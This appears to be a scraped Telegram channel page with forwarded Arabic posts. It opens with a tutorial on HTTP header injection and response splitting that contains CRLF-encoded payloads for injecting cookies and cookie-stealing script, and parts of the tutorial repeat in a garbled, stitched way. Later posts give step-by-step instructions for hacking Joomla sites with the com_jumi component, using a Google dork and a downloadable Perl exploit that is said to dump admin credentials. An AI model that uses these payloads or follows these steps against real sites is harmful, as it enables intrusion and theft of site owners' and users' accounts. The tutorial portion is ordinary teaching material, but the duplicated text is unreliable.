هو نوع من انواع ثغرات الclient-side ألا و هي ثغرة HTTP Header Injection.ما هي HTTP Response Splitting : هي أحد أنواع ثغرات الclient-side التي تظهر اذا تم استخدام مدخلات تحت تحكم المستخدم كقيم لHTTP Response Headers بدون تطهير و تأكد مناسبين، الأمر الذي قد يؤدي الي أمور خطيرة مثل ثغرات الCross Site Scripting و الCache Poisoning.في هذه الحالة يستطيع المهاجم استخدام قيمة الresponse header و اضافة الصيغتين CR و LF للخروج من الheader الراجع من الserver و إضافة الheaders المرادة، مما يسمح للمهاجم باستغلال الثغرة لتنفيذ هجوم Cache Poisoning اذا ما كان هناك caching server و من ثم إعادة نفس الرد من الserver لكل من يستخدم الموقع.يمكن أيضا الخروج كلياً من قسم الheaders و إضافة أي محتوي يريده المهاجم في قسم الbody من الرد، و الذي سوف يتم عرضه من قبل المتصفح. في هذه الحالة يمكن تنفيذ هجمات الCross-Site Scripting و التي قد تؤدي إلي سرقة حسابات المستخدمين.الصيغة CR هي اختصار لمصطلح Carriage Return، و التي تستخدم في الكتابة للرجوع لبداية السطر و عادةً ما توضح عن طريق كتابة r\ في لغات البرمجة. الصيغة الأخري، ألا و هي LF هي اختصار للمصطلح Line Feed، و تستخدم للحصول علي سطر جديد، سواء في ملف أو غيره، و تستخدم عن طريق كتابة n\ في العديد من لغات البرمجة.الصيغتين السابق ذكرهما لا يستخدمان عادةً بنفس الطريقة كما هو الحال في لغات البرمجة عندما نستخدمهما في البحث عن ثغرات الHeader Injection، لأن الweb applications تعتمد علي تقنية الURL Encoding في فهم و ترجمة أي مدخل ما لم يكن أحد حروف اللغة الإنجليزية أو أحد الأرقام من 0-9. لذلك، تم تعيين القيمة 0a% و 0d% للقيمتين n\ و r\ بالترتيب، علي أن تستخدم القيمة 0a% حينما نود التعبير عن الLF، و القيمة 0d% حين يتم التعبير عن الCR.أحد اكثر الأماكن شيوعاً لوجود هذا النوع من الثغرات هما الSet-Cookie و الLocation Headers. في الحالة الأولي يتم استخدام مدخل من المستخدم مباشرة كقيمة لcookie، و التي سوف تستخدم لاحقاً من قِبَل الweb application لتحديد حالة المستخدم. في الحالة الثانية يتم استخدام المدخل كقيمة الLocation Header، و الذي تستخدمه المتصفحات لمعرفة الهدف المرات التحويل إليه من قبل الweb application،
مثال 1:
فلنفترض ان هناك موقع يمكن استخدامه بلغتين، الإنجليزية و العربية مثلا. لنفترض أيضا ان هناك link في كل صفحة في الموقع و وظيفتها هي تغيير اللغة من العربية للإنجليزية و العكس، و شكل هذه الlink كاﻵتي في حالة التحويل للغة الإنجليزية:http://example.com?lang=enاذا ما تم الضغط علي هذه ال link، يتم إرسال طلب GET ل http://example.com?lang=en. يستقبل الserver الطلب، ثم يتم تحويل المستخدم لنفس الصفحة و لكن في الresponse يتم تحديد http header جديد، اسمه Set-Cookie و قيمته هي lang=en.في هذه الحالة يقوم الserver باستخدام القيمة المخصصة للمدخل lang مباشرة في الheader المسمي Set-Cookie بدون أي تأكد من عدم احتواؤه علي الصيغتين CR و LF مما يؤدي لظهور ثغرة HTTP Header Injection. في هذه الحالة يستطيع المهاجم استخدام الثغرة لتثبيت headers جديدة بأي قيم مرادة كالآتي:http://example.com?lang=en%0d%0aSet-Cookie:hacked=1في المثال السابق، يقوم المهاجم بالخروج من قيمة الSet-Cookie header الأولي (الأصلية) عبر استخدام الصيغتين 0d% و 0a% متتابعتين، ثم إضافة header جديد إسمه Set-Cookie و قيمته hacked=1 كتوضيح للثغرة، التالي هو منظر تخيلي للجزء المعني من رد الserver بعد الطلب السابق:HTTP/1.1 200 OKContent-Type: text/htmlSet-Cookie: lang=enSet-Cookie: hacked=1يمكن للمهاجم أيضا تغيير محتوي الصفحة كما ذكرنا سابقا عن طريق إضافة أكواد HTML لقسم الbody من رد الserver، الأمر الذي يمكن إستغلاله بسهولة للحصول علي و استغلال ثغرة Cross-Site Scripting إذا ما كان وجود القيم < و > في المدخلات مسموحاً من قِبَل الserver. التالي هو طلب GET تخيلي للاستغلال المذكور:http://example.com/?lang=en%0d%aContent-Length:53%0d%0a%0d%a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E%3C%2fhtml%3Eفي المثال السابق يتم إستخدام الصيغتين 0d% و 0a% متبوعتان بالheader المسمى Content-Length و قيمته 53، مما يخبر المتصفح ان عدد البايتات (الحروف) المراد إظهارها كbody للرد هو 53. يتم بعد ذلك استخدام نفس الصيغتين و لكن مرتين متتابعتين، و ذلك لإعلام المتصفح اننا نريد الوصول لقسم الbody من إجابة الserver، ثم بعد ذلك يتم حقن القيمة المراد إظهارها من المتصفح.القيمة %3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E%3C%2fhtml%3E ما هي الا <html><script>alert(document.cookie)</script></html> و لكن بعمد عملية
هو نوع من انواع ثغرات الclient-side ألا و هي ثغرة HTTP Header Injection.ما هي HTTP Response Splitting : هي أحد أنواع ثغرات الclient-side التي تظهر اذا تم استخدام مدخلات تحت تحكم المستخدم كقيم لHTTP Response Headers بدون تطهير و تأكد مناسبين، الأمر الذي قد يؤدي الي أمور خطيرة مثل ثغرات الCross Site Scripting و الCache Poisoning.في هذه الحالة يستطيع المهاجم استخدام قيمة الresponse header و اضافة الصيغتين CR و LF للخروج من الheader الراجع من الserver و إضافة الheaders المرادة، مما يسمح للمهاجم باستغلال الثغرة لتنفيذ هجوم Cache Poisoning اذا ما كان هناك caching server و من ثم إعادة نفس الرد من الserver لكل من يستخدم الموقع.يمكن أيضا الخروج كلياً من قسم الheaders و إضافة أي محتوي يريده المهاجم في قسم الbody من الرد، و الذي سوف يتم عرضه من قبل المتصفح. في هذه الحالة يمكن تنفيذ هجمات الCross-Site Scripting و التي قد تؤدي إلي سرقة حسابات المستخدمين.الصيغة CR هي اختصار لمصطلح Carriage Return، و التي تستخدم في الكتابة للرجوع لبداية السطر و عادةً ما توضح عن طريق كتابة r\ في لغات البرمجة. الصيغة الأخري، ألا و هي LF هي اختصار للمصطلح Line Feed، و تستخدم للحصول علي سطر جديد، سواء في ملف أو غيره، و تستخدم عن طريق كتابة n\ في العديد من لغات البرمجة.الصيغتين السابق ذكرهما لا يستخدمان عادةً بنفس الطريقة كما هو الحال في لغات البرمجة عندما نستخدمهما في البحث عن ثغرات الHeader Injection، لأن الweb applications تعتمد علي تقنية الURL Encoding في فهم و ترجمة أي مدخل ما لم يكن أحد حروف اللغة الإنجليزية أو أحد الأرقام من 0-9. لذلك، تم تعيين القيمة 0a% و 0d% للقيمتين n\ و r\ بالترتيب، علي أن تستخدم القيمة 0a% حينما نود التعبير عن الLF، و القيمة 0d% حين يتم التعبير عن الCR.أحد اكثر الأماكن شيوعاً لوجود هذا النوع من الثغرات هما الSet-Cookie و الLocation Headers. في الحالة الأولي يتم استخدام مدخل من المستخدم مباشرة كقيمة لcookie، و التي سوف تستخدم لاحقاً من قِبَل الweb application لتحديد حالة المستخدم. في الحالة الثانية يتم استخدام المدخل كقيمة الLocation Header، و الذي تستخدمه المتصفحات لمعرفة الهدف المرات التحويل إليه من قبل الweb application،
مثال 1:
فلنفترض ان هناك موقع يمكن استخدامه بلغتين، الإنجليزية و العربية مثلا. لنفترض أيضا ان هناك link في كل صفحة في الموقع و وظيفتها هي تغيير اللغة من العربية للإنجليزية و العكس، و شكل هذه الlink كاﻵتي في حالة التحويل للغة الإنجليزية:http://example.com?lang=enاذا ما تم الضغط علي هذه ال link، يتم إرسال طلب GET ل http://example.com?lang=en. يستقبل الserver الطلب، ثم يتم تحويل المستخدم لنفس الصفحة و لكن في الresponse يتم تحديد http header جديد، اسمه Set-Cookie و قيمته هي lang=en.في هذه الحالة يقوم الserver باستخدام القيمة المخصصة للمدخل lang مباشرة في الheader المسمي Set-Cookie بدون أي تأكد من عدم احتواؤه علي الصيغتين CR و LF مما يؤدي لظهور ثغرة HTTP Header Injection. في هذه الحالة يستطيع المهاجم استخدام الثغرة لتثبيت headers جديدة بأي قيم مرادة كالآتي:http://example.com?lang=en%0d%0aSet-Cookie:hacked=1في المثال السابق، يقوم المهاجم بالخروج من قيمة الSet-Cookie header الأولي (الأصلية) عبر استخدام الصيغتين 0d% و 0a% متتابعتين، ثم إضافة header جديد إسمه Set-Cookie و قيمته hacked=1 كتوضيح للثغرة، التالي هو منظر تخيلي للجزء المعني من رد الserver بعد الطلب السابق:HTTP/1.1 200 OKContent-Type: text/htmlSet-Cookie: lang=enSet-Cookie: hacked=1يمكن للمهاجم أيضا تغيير محتوي الصفحة كما ذكرنا سابقا عن طريق إضافة أكواد HTML لقسم الbody من رد الserver، الأمر الذي يمكن إستغلاله بسهولة للحصول علي و استغلال ثغرة Cross-Site Scripting إذا ما كان وجود القيم < و > في المدخلات مسموحاً من قِبَل الserver. التالي هو طلب GET تخيلي للاستغلال المذكور:http://example.com/?lang=en%0d%aContent-Length:53%0d%0a%0d%a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E%3C%2fhtml%3Eفي المثال السابق يتم إستخدام الصيغتين 0d% و 0a% متبوعتان بالheader المسمى Content-Length و قيمته 53، مما يخبر المتصفح ان عدد البايتات (الحروف) المراد إظهارها كbody للرد هو 53. يتم بعد ذلك استخدام نفس الصيغتين و لكن مرتين متتابعتين، و ذلك لإعلام المتصفح اننا نريد الوصول لقسم الbody من إجابة الserver، ثم بعد ذلك يتم حقن القيمة المراد إظهارها من المتصفح.القيمة %3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E%3C%2fhtml%3E ما هي الا <html><script>alert(document.cookie)</script></html> و لكن بعمد عملية
October 29, 2019
Forwarded from Termux CS
URL encoding. المثال يقوم بحقن كود javascript و الذي يستخدم دالة ال alert لإظهار قيمة الcookie الخاصة بالمستخدم كمثال. التالي هو المنظر التخيلي للرد القادم من الserver:HTTP/1.1 200 OKContent-Type: text/htmlSet-Cookie: lang=enContent-Length: 53<html><script>alert(document.cookie)></script></html>
مثال 2:
في هذا المثال سنفترض اننا اكتشفنا ثغرة open redirects(تحويل مفتوح) في أحد المواقع و نود أن نستغلها بصورة أكبر لإحداث ثغرة Cross-Site Scripting. في هذه الحالة سنفترض أن الURL المصاب هو الآتي:http://example.com?redirect=http://evil.comعلى أن يكون المدخل المسمي redirect هو المستخدم من قِبَل الserver للتحويل للURL المعطي له، في هذا المثال http://evil.com، و لنتفرض أيضا أن الآتي هو الرد العائد من الserver في حين تنفيذ طلب GET للURL السابق ذكره:HTTP/1.1 302 FoundLocation: http://evil.comإكتشفنا بعد ذلك وجود ثغرة Header Injection و إكتشفنا ان الserver يقوم بتمرير قيمة المدخل redirect مباشرةً للLocation header، تماما كما هو الحال في المثال الأول، و نريد اﻵن استغلال الثغرة للحصول علي ثغرة Cross-Site Scripting. هناك أمر مختلف في هذه الحالة و الذي يجب ملاحظته حتي يكون الهجوم ناجح في النهاية، ألا و هو الresponse code العائد من الserver. في المثال الأول الresponse code كان 200 OK، في هذه الحالة لم يكن هناك مشكلة في استغلال الثغرة، و لكن في حالة المثال الثاني الresponse code هي 302 Found. المتصفحات تستخدم هذا الresponse code للتحويل تلقائياً للقيمة المخصصة للLocation header، إذاً فما العمل في هذه الحالة ؟لحسن الحظ، فمعظم المتصفحات تستخدم آخر قيمة موجودة في الرد للresponse code إذا ما كانت قيمة الContent-Length header للresponse code الأصلي صفر، بمعني أننا في هذه الحالة يمكننا أيضاً إضافة الresponse code المناسب و سوف يستخدمها المتصفح تلقائياً و سيتجاهل القيمة الأصلية و في هذه الحالة تعرف الثغرة باسم HTTP Response Splitting. التالي هو قيمة تخيلية لما سيحقنه المهاجم:http://example.com/?redirect=http://evil.com%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2053%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E%3C%2fhtml%3Eفي المثال السابق يتم الآتي:إستخدام الصيغتين المعروفتين للخروج من الLocation headerإضافة Content-Length header قيمته 0 لإبطال مفعول الرد الأصلي من الserverإضافة HTTP/1.1 200 OK كبداية للرد الجديدإضافة Content-Type header قيمته text/html ليعلم المتصفح ان قسم الbody من الرد سيحتوي علي كود HTMLإضافة Content-Length header آخر، و لكن هذه المرة قيمته 53، و هو طول كود الHTML المحقونو أخيرا كود الHTML المحقون نفسه، و هي نفس القيمة المستخدمة في المثال الأولالتالي هو منظر تخيلي للرد الناتج من الطلب السابق :HTTP/1.1 302 FoundLocation: http://evil.comContent-Length: 0HTTP/1.1 200 OKContent-Type: text/htmlContent-Length: 53<html><script>alert(document.cookie)</script></html>أتمني أن تكونوا قد استفدتم من الموضوع
مثال 2:
في هذا المثال سنفترض اننا اكتشفنا ثغرة open redirects(تحويل مفتوح) في أحد المواقع و نود أن نستغلها بصورة أكبر لإحداث ثغرة Cross-Site Scripting. في هذه الحالة سنفترض أن الURL المصاب هو الآتي:http://example.com?redirect=http://evil.comعلى أن يكون المدخل المسمي redirect هو المستخدم من قِبَل الserver للتحويل للURL المعطي له، في هذا المثال http://evil.com، و لنتفرض أيضا أن الآتي هو الرد العائد من الserver في حين تنفيذ طلب GET للURL السابق ذكره:HTTP/1.1 302 FoundLocation: http://evil.comإكتشفنا بعد ذلك وجود ثغرة Header Injection و إكتشفنا ان الserver يقوم بتمرير قيمة المدخل redirect مباشرةً للLocation header، تماما كما هو الحال في المثال الأول، و نريد اﻵن استغلال الثغرة للحصول علي ثغرة Cross-Site Scripting. هناك أمر مختلف في هذه الحالة و الذي يجب ملاحظته حتي يكون الهجوم ناجح في النهاية، ألا و هو الresponse code العائد من الserver. في المثال الأول الresponse code كان 200 OK، في هذه الحالة لم يكن هناك مشكلة في استغلال الثغرة، و لكن في حالة المثال الثاني الresponse code هي 302 Found. المتصفحات تستخدم هذا الresponse code للتحويل تلقائياً للقيمة المخصصة للLocation header، إذاً فما العمل في هذه الحالة ؟لحسن الحظ، فمعظم المتصفحات تستخدم آخر قيمة موجودة في الرد للresponse code إذا ما كانت قيمة الContent-Length header للresponse code الأصلي صفر، بمعني أننا في هذه الحالة يمكننا أيضاً إضافة الresponse code المناسب و سوف يستخدمها المتصفح تلقائياً و سيتجاهل القيمة الأصلية و في هذه الحالة تعرف الثغرة باسم HTTP Response Splitting. التالي هو قيمة تخيلية لما سيحقنه المهاجم:http://example.com/?redirect=http://evil.com%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2053%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E%3C%2fhtml%3Eفي المثال السابق يتم الآتي:إستخدام الصيغتين المعروفتين للخروج من الLocation headerإضافة Content-Length header قيمته 0 لإبطال مفعول الرد الأصلي من الserverإضافة HTTP/1.1 200 OK كبداية للرد الجديدإضافة Content-Type header قيمته text/html ليعلم المتصفح ان قسم الbody من الرد سيحتوي علي كود HTMLإضافة Content-Length header آخر، و لكن هذه المرة قيمته 53، و هو طول كود الHTML المحقونو أخيرا كود الHTML المحقون نفسه، و هي نفس القيمة المستخدمة في المثال الأولالتالي هو منظر تخيلي للرد الناتج من الطلب السابق :HTTP/1.1 302 FoundLocation: http://evil.comContent-Length: 0HTTP/1.1 200 OKContent-Type: text/htmlContent-Length: 53<html><script>alert(document.cookie)</script></html>أتمني أن تكونوا قد استفدتم من الموضوع
October 29, 2019
Forwarded from !+'s me
لأختراق ثغرة inurl:com_jumi
تنزل الملف من الرابط
تفتح cmd
تكتب desktop
تكتبperl
تكتب jumi.pl
تكتب www.domain.com
مصاب بثغره والحمدالله
طريقة تسجيل administartor
Dork : inurl:com_jumi
Exploit download : http://pastebin.com/kqjtBXpM
تنزل الملف من الرابط
تفتح cmd
تكتب desktop
تكتبperl
تكتب jumi.pl
تكتب www.domain.com
مصاب بثغره والحمدالله
طريقة تسجيل administartor
Dork : inurl:com_jumi
Exploit download : http://pastebin.com/kqjtBXpM
Pastebin
#!/usr/bin/perl -w #########################################[~] Author : M - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
October 29, 2019
Forwarded from !+'s me
لأختراق ثغرة inurl:com_jumi
تنزل الملف من الرابط
تفتح cmd
تكتب desktop
تكتبperl
تكتب jumi.pl
تكتب www.domain.com
يخرجلك لائحة يوزر
Admin:********
Pass:*********
مصاب بثغره والحمدالله
طريقة تسجيل administartor
Dork : inurl:com_jumi
Exploit download : http://pastebin.com/kqjtBXpM
تنزل الملف من الرابط
تفتح cmd
تكتب desktop
تكتبperl
تكتب jumi.pl
تكتب www.domain.com
يخرجلك لائحة يوزر
Admin:********
Pass:*********
مصاب بثغره والحمدالله
طريقة تسجيل administartor
Dork : inurl:com_jumi
Exploit download : http://pastebin.com/kqjtBXpM
October 29, 2019